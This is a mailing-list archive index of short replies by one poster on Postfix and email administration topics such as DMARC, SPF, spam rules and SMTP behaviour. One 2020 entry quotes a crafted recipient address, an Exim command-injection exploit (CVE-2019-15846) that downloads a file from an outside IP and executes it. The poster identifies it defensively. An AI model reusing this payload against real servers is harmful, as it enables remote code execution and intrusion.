Re: How to implement something close to, but not quite an "announcement-only" mailing list?

2017-04-14 Thread Kevin A. McGrail
On 4/14/2017 9:35 PM, Ramon F Herrera wrote: I guess this would be more descriptive and succinct: A "members-only PLUS disguising of all e-mail addresses contained in the headers" mailing list. I didn't follow all your logic in the previous email but overall you'll likely need something

Re: How to implement something close to, but not quite an "announcement-only" mailing list?

2017-04-15 Thread Kevin A. McGrail
On 4/14/2017 10:19 PM, Ramon F Herrera wrote: On 4/14/2017 8:41 PM, Kevin A. McGrail wrote: On 4/14/2017 9:35 PM, Ramon F Herrera wrote: I guess this would be more descriptive and succinct: A "members-only PLUS disguising of all e-mail addresses contained in the headers" maili

Re: Do you know an FOSS email system for kids?

2017-04-19 Thread Kevin A. McGrail
On 4/19/2017 7:43 AM, Dedeco Balaco Baco wrote: in the last months, I have been searching for an email system with some features to make it better for kids, even for younger ages, and also their parents. We need a few features to guarantee some security to free messaging among known friends, but

Re: Do you know an FOSS email system for kids?

2017-04-18 Thread Kevin A. McGrail
On 4/15/2017 10:31 AM, Dedeco Balaco Baco wrote: in the last months, I have been searching for an email system with some features to make it better for kids, even for younger ages, and also their parents. We need a few features to guarantee some security to free messaging among known friends,

Re: What's a better error code than 554 to get a sending server to stop retrying?

2017-07-25 Thread Kevin A. McGrail
On 7/25/2017 7:42 PM, /dev/rob0 wrote: Oh, I disagree. The best thing to do is to reject anything you're unwilling/unable to deliver. You're not causing any bounces; if a connecting client does generate a bounce for your rejection that is THEIR problem; or in the case of a human sender, that

Re: What's a better error code than 554 to get a sending server to stop retrying?

2017-07-25 Thread Kevin A. McGrail
On 7/25/2017 5:51 PM, robg...@nospammail.net wrote: Depending on where I read about it that "554 5.7.1" error code means "failed transaction". Unfortunately, you might need logic to accept and silently discard. We do this, for example, with viruses to avoid blowback. Regards, KAM

Re: OT? SRV records etc

2017-04-25 Thread Kevin A. McGrail
On 4/25/2017 4:57 PM, John wrote: How likely is it for a DNS to have SRV records for such things as smtp. imap ... I know that's a dumb ? but I am trying to guesstimate how big a dewy-eyed optimist I am being in hoping that they are common practice. In my experience, very rare, not even sure what

Re: accept+discard vs. reject

2017-07-25 Thread Kevin A. McGrail
On 7/25/2017 8:48 PM, /dev/rob0 wrote: I am curious, what kind of logic do you have to determine that a spamming client might be a backscatterer? Are you talking about a custom policy service, or a milter? For the record, I can agree to disagree as I respect and understand your position. I

Re: OT? - Blocking attachments

2017-05-14 Thread Kevin A. McGrail
On 5/14/2017 7:22 AM, john wrote: This may not be a Postfix problem, but bearing in mind the recent events this forum may have some good ideas. After the recent ransomware attacks we are considering the idea of blocking all attachments. I am not sure of the best way of doing this, but

Re: Do you know an FOSS email system for kids?

2017-04-30 Thread Kevin A. McGrail
On 4/30/2017 12:48 PM, Dedeco Balaco Baco wrote: Kam, I am still a bit puzzled with what I should do. I have seen the README file inside your attachment, and it mentions Sendmail several times. But it does not mention Postfix. Is it possible to install Mimedefang and BeggarMail with Postfix? I

Re: Trace spam activity on mail server

2017-05-02 Thread Kevin A. McGrail
its Trend Micro. Yes, I'm a big fan of MXToolBox. Great tool! I agree, you might be looking for a ghost in the machine that doesn't exist and it's a FP from TrendMicro. Regards, KAM -- *Kevin A. McGrail* CEO Peregrine Computer Consultants Corporation 10311 Cascade Lane Fairfax, VA 22032

Re: Trace spam activity on mail server

2017-05-02 Thread Kevin A. McGrail
On 5/2/2017 10:56 AM, li...@lazygranch.com wrote: Would a spammy email server only trigger one RBL? Sure. Spam is often in the eye of the beholder, people use different feeds, different policies, purposes, etc. I wouldn't discount it that it's an issue just because it's only on one RBL.

Re: Trace spam activity on mail server

2017-05-02 Thread Kevin A. McGrail
On 5/2/2017 9:51 AM, Michael Segel wrote: You can run a check on your MX Server… there are a couple of web sites that do this… and I think one or two will identify the RBLs that include you. One trick I use a lot when I have an infected machine on a network or a customer with a problem is that

Re: Do you know an FOSS email system for kids?

2017-04-30 Thread Kevin A. McGrail
On 4/30/2017 2:12 PM, Dedeco Balaco Baco wrote: But what did you use to make this interface? Before reading some documentation about Beggarmail and Mimedefang, I thought about using PHP. Now I am not sure that would be a practical solution. PHP would be a straightforward way to go. Any

Re: How to fake Per-Recipient Data Responses (PRDR)?

2017-10-02 Thread Kevin A. McGrail
On 10/1/2017 8:15 PM, MRob wrote: Hello, short of Per-Recipient Data Responses (PRDR) becoming standard, may I ask how administrators are faking it? I understand you can temp-fail all but the first rcpt-to, but how to do this in Postfix? Does it require a custom milter? Surely there must be a

Re: How to fake Per-Recipient Data Responses (PRDR)?

2017-10-02 Thread Kevin A. McGrail
On 10/2/2017 11:14 AM, Noel Jones wrote: http://www.postfix.org/postconf.5.html#smtpd_recipient_limit I don't think we are talking about the same thing.  If I set this to 1, I would expect a 5xx for an email with more than one recipient. Do you know for sure? Regards, KAM

Re: How to fake Per-Recipient Data Responses (PRDR)?

2017-10-02 Thread Kevin A. McGrail
On 10/2/2017 11:47 AM, Noel Jones wrote: Yes, for sure. Extra recipients will get a 4xx response. Note this may *severely* delay deliveries, depending on the sender's retry policy. If a message arrives with 100 recipients, the sender will need to retry 99 times, which will likely take a very

Re: Simple mailing list: Possible for multiple domains?

2017-08-21 Thread Kevin A. McGrail
On 8/21/2017 8:30 AM, Benny Pedersen wrote: wie...@porcupine.org wrote on 2017-08-21 14:05: Use mailman. It sets the envelope sender, meaning that there is no need for SRS, and presumably supports From: header munging, to work around DMARC damage. what damage?, at least it's not needed on

Re: Simple mailing list: Possible for multiple domains?

2017-08-21 Thread Kevin A. McGrail
Benny, I wrote those notes years ago when Yahoo! surprised a lot of people with the enforcement of DMARC with little consideration for mailing lists. http://dmarc.org/faq.html#s_3 is the key point. IMO, some providers acted rashly and broke a lot of things but in the end it likely is better for

Re: accept email if pass SPF or DKIM

2018-01-10 Thread Kevin A. McGrail
On 1/10/2018 9:53 PM, li...@lazygranch.com wrote: RTFMing, I see that both opendkim and python-policyd-spf have whitelisting capabilities (especially python-policyd-spf). But for the most part, my legitimate incoming email passes DKIM or SPF, but often not both. What I would like to do is accept

Re: Two different IP for one mx

2018-01-29 Thread Kevin A. McGrail
On 1/29/2018 5:03 PM, jin wrote: It is 192.168.34.30/24 So that's a Class C (256 IPs) block from the reserved private class B address block*.  So you are definitely NATted if you have access to the internet. If you have a 1:1 NAT and can do port forwards, etc. up

Re: Server will send spam

2018-01-29 Thread Kevin A. McGrail
On 1/29/2018 4:59 PM, Maurizio Caloro wrote: Since today my email server is sending a lot of rubbish, and I don't know why. Please can anyone give me a little help here! The evidence you sent shows from a brief review that it's coming from your mail server.  I think you likely have a

Re: Two different IP for one mx

2018-01-29 Thread Kevin A. McGrail
On 1/29/2018 4:09 PM, jin wrote: We are trying to move our mx server to another isp. They gave us an IP address but there are some strange points. When I try to connect to any mail related port on that ip, it sends my connection to our new postfix server. There is a destination nat on it. It is

Re: FWIW, port 465 gets standards-track blessing from RFC8314

2018-02-12 Thread Kevin A. McGrail
On 2/12/2018 9:05 PM, @lbutlr wrote: On 2018-02-12 (18:28 MST), Harald Koch wrote: I can't think of a single reason to have two submission ports. Compatibility with the clients that only implement one? Are there any? It's been a long time since I saw someone using an old

Re: Spammer rejected, but resends every 10 minutes. Any way to prevent this

2018-03-13 Thread Kevin A. McGrail
On 3/13/2018 10:51 PM, li...@lazygranch.com wrote: > I'm getting hit every 10 minutes from this spammer. As you can see I am > rejecting the message. I wonder if the offending email server doesn't > know the message is being rejected? > > Mar 13 23:28:58 centos-1gb-sfo1-01 postfix/smtpd[22153]:

Re: Read Only account

2018-04-20 Thread Kevin A. McGrail
On 4/20/2018 3:40 PM, @lbutlr wrote: > How would I configure a user so that they could only read mail and not send > any mail (even to local users). > Different auth for POP or IMAP vs SMTP?

Re: Fwd: analysing of dmarc report

2018-11-21 Thread Kevin A. McGrail
You might look into dmarcian.com to help. Regards, KAM On November 21, 2018 2:33:12 AM EST, Poliman - Serwis wrote: >I have a problem with understanding dmarc reports and some features. >I attach two reports. First one comes from google.com, second one from >tumieszkamy.pl. On my server is dns

Re: pishing from ME

2019-03-22 Thread Kevin A. McGrail
d management. See https://www.bettercloud.com/monitor/a-top-g-suite-expert-shares-his-31-best-modern-security-tips/ and search passphrases. Also see KAM.cf and the KAM_CRIM ruleset for spamassassin for this exact run of spams. Regards, KAM -- *Kevin A. McGrail* CEO Emeritus Peregrine Computer Consu

Re: pishing from ME

2019-03-22 Thread Kevin A. McGrail
On 3/22/2019 9:31 PM, Viktor Dukhovni wrote: >> Have you checked on haveibeenpwned for the email addresses and domains >> in question? > There's no need. The team mailboxes in question are not associated > with any login accounts, they're just public contact addresses > scraped from websites.

Re: pishing from ME

2019-03-22 Thread Kevin A. McGrail
//www.google.com/url?q=https%3A%2F%2Fwww.webex.com%2Fpdf%2Ftollfree_restrictions.pdf=D=1553730640914000=AFQjCNFEa-zxAltZcMVMj9XNBRIxOQqE2A>Access code: 927 552 095 Regards, KAM -- *Kevin A. McGrail* CEO Emeritus Peregrine Computer Consultants Corporation 10311 Cascade Lane Fairfax, VA 22032 ht

Re: pishing from ME

2019-03-22 Thread Kevin A. McGrail
On 3/22/2019 9:06 PM, Viktor Dukhovni wrote: > Sure they may also be scraping email addresses from breaches, but > that's one source. These scams are not a specific indication that > one's passwords are at risk. That's true or false with or without > receipt of these scams. Have you checked on

OFF-TOPIC: KAM.cf to Core SA was Re: pishing from ME

2019-03-22 Thread Kevin A. McGrail
On 3/22/2019 10:45 PM, Benny Pedersen wrote: > Kevin A. McGrail wrote on 2019-03-23 00:34: > >> Also see KAM.cf and the KAM_CRIM ruleset for spamassassin for this >> exact run of spams. > > will you add good rules to core spamassassin ? > > so above is testing

Re: ODMR/ATRN ?

2019-06-09 Thread Kevin A. McGrail
anything written in Perl running > on any outward facing port. It's just way too easy for an attacker to > run the CPU usage up to 100% and keep it there if one does so. > > Looking forward to info on Postfix support for ODMR or alternatives thereto. > > > Regards, > rfg -

Re: ODMR/ATRN ?

2019-06-09 Thread Kevin A. McGrail
On 6/9/2019 6:18 PM, Ronald F. Guilmette wrote: > Thank you, but I need to be frank. I thought you were Ronald?  :-) > I believe that I understand fully how to handle my outbound email traffic, > i.e. treating my (soon to be) cloud VM running Postfix as a "smarthost" > for outbound. That part

Re: spam from own email address

2019-04-23 Thread Kevin A. McGrail
On 4/23/2019 10:02 AM, Ian Jones wrote: > I am getting emails like the one below, in which the header from is my > own address. Ian, are you using Apache SpamAssassin or something in the mix?  I've published a lot of rules for these sexploitation scams in KAM.cf and with an SPF record, you

Re: spam from own email address

2019-04-23 Thread Kevin A. McGrail
On 4/23/2019 12:20 PM, Benny Pedersen wrote: > // maintainer hat on > > why are these rules not added to spamassassin core :( > Because masscheck and rule qa takes too long for the purposes we need the rules for. > \\ maintainer hat off > > or at least a real spamassassin channel repo

OFF-TOPIC - Re: Adding DKIM and DMARC

2019-08-25 Thread Kevin A. McGrail
On 8/25/2019 11:49 AM, @lbutlr wrote: > When adding DMARC and DKIM do I only need to add it to the domain that is > hosting the mail server (MX)? > > For example, if mail.example.com is defined as the MX for example.com and > example.net, do I need to add the DMARC/DKIM records to example.net’s

Re: Refuse mail from hosts with closed port 25

2019-09-16 Thread Kevin A. McGrail
On 9/16/2019 11:00 AM, Benny Pedersen wrote: > Kevin A. McGrail wrote on 2019-09-16 16:19: >> Fair enough.  Maybe he should turn that feature on then :-) > > if you do you can't receive email from me > > validMX is strict to say domains without MX is invalid domain ? &

Re: Refuse mail from hosts with closed port 25

2019-09-16 Thread Kevin A. McGrail
e a bit more strict than > Postfix's built-in address sanity checks. -- *Kevin A. McGrail* CEO Emeritus Peregrine Computer Consultants Corporation 10311 Cascade Lane Fairfax, VA 22032 http://www.pccc.com/ 703-359-9700 / 800-823-8402 (Toll-Free) 703-798-0171 (wireless) kmcgr...@pccc.com <mailto

Re: Refuse mail from hosts with closed port 25

2019-09-16 Thread Kevin A. McGrail
On 9/16/2019 9:03 AM, Jim Reid wrote: > On 16 Sep 2019, at 13:47, Paul van der Vlis wrote: > > How can I refuse mail from hosts who don't have an open port 25? Paul, I wrote a module which I need to update on Perl's CPAN called Net::validMX that we use to reject IPv4 domains that aren't properly

Re: block 'new style' TLDs ?

2019-11-02 Thread Kevin A. McGrail
.gz 65b783d037ebe8a99466e15c0409c51ed3fa12d046139232ba90d6ccb63614008e2c54138a01f8afe67f38c163e5bf2955d2c8fd2bf2397b83d09a4b0a6534e7 Mail-SpamAssassin-3.4.3-rc5.zip ed1565c8f4448319546808fc2a2326f380153699631089c183ee93aa962fded59414643b2345ecdfabf9098d40609dd121b1056feabd162d830ea527ec2c3b04

Re: [External] Block email based on reply field

2019-12-11 Thread Kevin A. McGrail
If you have integrated with Apache SpamAssassin, then v3.4.3 introduces the ability to do RBL lookups on the domain in Reply-to as well as the ability to do hashed lookups. Regards, KAM On 12/11/2019 9:38 PM, li...@lazygranch.com wrote: > I have a spammer who uses all sorts of "from" addresses

Re: [External] Re: SPF IP addresses limit question

2020-02-24 Thread Kevin A. McGrail
On 2/23/2020 11:30 PM, Mohamed Lrhazi wrote: > > My question still was: Suppose I comply with all the > recommendations and best practices in composing my SPF records... Do I > still need to worry about the number of IP addresses (v4/v6/ciders) > that I put in each record? Yes. In the anti-spam

Re: [External] Re: SPF IP addresses limit question

2020-02-23 Thread Kevin A. McGrail
On 2/23/2020 7:08 PM, Scott Kitterman wrote: > The limits are a function of DNS, not SPF, which is why RFC 7208 Section 3.4. > was written. I would there is also a somewhat arbitrary limit that was picked that doesn't match the real world.  See

Re: [External] command injection by crafted recipient address

2020-03-12 Thread Kevin A. McGrail
On 3/12/2020 4:40 PM, kris_h wrote: > root+${run{x2Fbinx2Fsht-ctx22wgetx20103.11.228.92x2fssx20-Osxsx3bchmodx20x2bxx20sxsx3b.x2fsxsx22}}@localhost It's an exim exploit.  See CVE-2019-15846. Regards, KAM

OFF-TOPIC: Re: [External] Re: why DMARC PASS even SPF got failed

2020-04-28 Thread Kevin A. McGrail
> Scott, I have another question. Gents, I love geeking about email and spam techniques but these are not postfix related nor do they relate to beer*.  IMO these should be discussed elsewhere. Regards, KAM * There are some mailing lists with exclusions that discussions on beer are always

Re: [External] spam uses my email address as sender in "header from"

2020-09-14 Thread Kevin A. McGrail
On 9/14/2020 6:35 AM, Fourhundred Thecat wrote: > Can I reject messages that have different envelope from and header from? > > Or what would be the best approach ? Are you publishing an SPF record?  Are you using DKIM?  Are you publishing a DMARC policy (even one with policies of none)?  Are

Re: [External] Re: postfix and MX

2020-09-17 Thread Kevin A. McGrail
On 9/17/2020 9:20 PM, Antonio Leding wrote: > > I stopped believing long ago that Microsoft adhered to any standard in > earnest.  To me, they always seemed to be more about > implanting new standards that the world would then follow… In fairness, Microsoft's embrace/extend/extinguish plans are

Re: [External] Re: The historical roots of our computer terms

2020-06-06 Thread Kevin A. McGrail
Wietse > >> Leah Culver (@leahculver) tweeted at 11:32 PM on Fri, Jun 05, 2020: >> I refuse to use "whitelist"/"blacklist" or "master"/"slave" terminology for >> computers. Join me. Words matter. >> (https://twitter.com/leahculver/status/1269109776983547904?s=03) -- *Ke

Re: [External] Re: The historical roots of our computer terms

2020-06-06 Thread Kevin A. McGrail
On 6/6/2020 11:00 AM, Ian Evans wrote: > > > On Sat, Jun 6, 2020, 10:28 AM Kevin A. McGrail, <mailto:kmcgr...@pccc.com>> wrote: > > Thanks for the reminder on this.  The Apache SpamAssassin project > voted to do this change on May 3rd and I'm taki

Re: [External] Re: The historical roots of our computer terms

2020-06-08 Thread Kevin A. McGrail
On 6/8/2020 9:06 AM, John Dale wrote: > Why does this agitate people?  Because if the time spent on this > change had been used to fix an actual deficiency, people of color who > use the software would have been served with value, not just platitudes. Sounds like a lot of pontificating.  Can you

Re: [External] Re: The historical roots of our computer terms

2020-06-08 Thread Kevin A. McGrail
On 6/8/2020 8:37 AM, Phil Stracchino wrote: > The color is widely and somewhat sardonically known as 'bleen' or 'grue'. See, that's just wrong. We all know what a Grue is... Regards, KAM https://zork.fandom.com/wiki/Grue

Re: [External] Re: The historical roots of our computer terms

2020-06-08 Thread Kevin A. McGrail
On 6/8/2020 9:54 AM, vi...@vheuser.com wrote: > > On 2020/06/08 09:31 AM, Kevin A. McGrail wrote: >> On 6/8/2020 9:06 AM, John Dale wrote: >>> Why does this agitate people?  Because if the time spent on this >>> change had been used to fix an actual deficienc

Re: [External] SPAM attack from bounce techniques

2020-12-29 Thread Kevin A. McGrail
On 12/29/2020 7:37 AM, Rafael Azevedo wrote: Hi there, I've noticed that one of our servers is receiving a huge amount of unauthorized requests. User connects to our server and tries to send an email to any destination. Our servers denies the message because user is not authenticated.

Re: [External] Postfix and Mimedefang for single user?

2021-03-28 Thread Kevin A. McGrail
Hi LuKreme, I believe once you hook in MIMEDefang with postfix, it's a general purpose filter that uses the milter interface to process emails at various stages of the mail dialogue and processing.  It hurts my brain to think about whether Postfix could do a filter on the recipients and then

Re: [External] Re: Deprecated: white is better than black

2021-02-24 Thread Kevin A. McGrail
the reminder, configure the respectful_logging parameter to "yes" or "no", or configure "compatibility_level = 3.6". -- *Kevin A. McGrail* /CEO Emeritus/ *Peregrine Computer Consultants Corporation* +1.703.798.0171 kmcgr...@

Re: [External] Re: turning off spamass-milter for authenticated submissions? SPF for submitted emails?

2021-10-11 Thread Kevin A. McGrail
On 10/11/2021 5:32 PM, Carl Brewer wrote:  0.0 URIBL_BLOCKED  ADMINISTRATOR NOTICE: The query to URIBL was     blocked.  See http://wiki.apache.org/spamassassin/DnsBlocklists#dnsbl-block for more information. Carl, I noticed this

Re: [External] Re: turning off spamass-milter for authenticated submissions? SPF for submitted emails?

2021-10-12 Thread Kevin A. McGrail
On 10/11/2021 6:28 PM, Carl Brewer wrote: http://wiki.apache.org/spamassassin/DnsBlocklists#dnsbl-block for more information. Carl, I noticed this and wanted to mention if you are using something like Google's quad8 for your resolver?  If so, install a caching

Re: [External] Re: Why the name Postfix?

2022-03-28 Thread Kevin A. McGrail
Great Idea!  Done On 3/27/2022 6:08 PM, lists wrote: Perhaps someone who knows how to update wiki can add this information. https://en.wikipedia.org/wiki/Postfix_(software)

Re: [External] What does AW mean - was - Re: AW: RSA and ECDSA - warning: No certs for key at index 1

2022-05-31 Thread Kevin A. McGrail
On 5/31/2022 10:18 AM, Bret Busby wrote: I keep seeing "AW" prepended to message subjects and I have no idea of what it means. What does it mean? I believe it's the German equivalent for re: (https://en.wikipedia.org/wiki/List_of_email_subject_abbreviations) as in Regarding. Regards, KAM

Re: [External] Re: Outlook TLS errors after Microsoft Windows Update

2022-10-26 Thread Kevin A. McGrail
On 10/26/2022 10:56 AM, Viktor Dukhovni wrote: On Wed, Oct 26, 2022 at 03:56:29PM +0200, Gerald Galster wrote: This issue is resolved by update KB5018496 for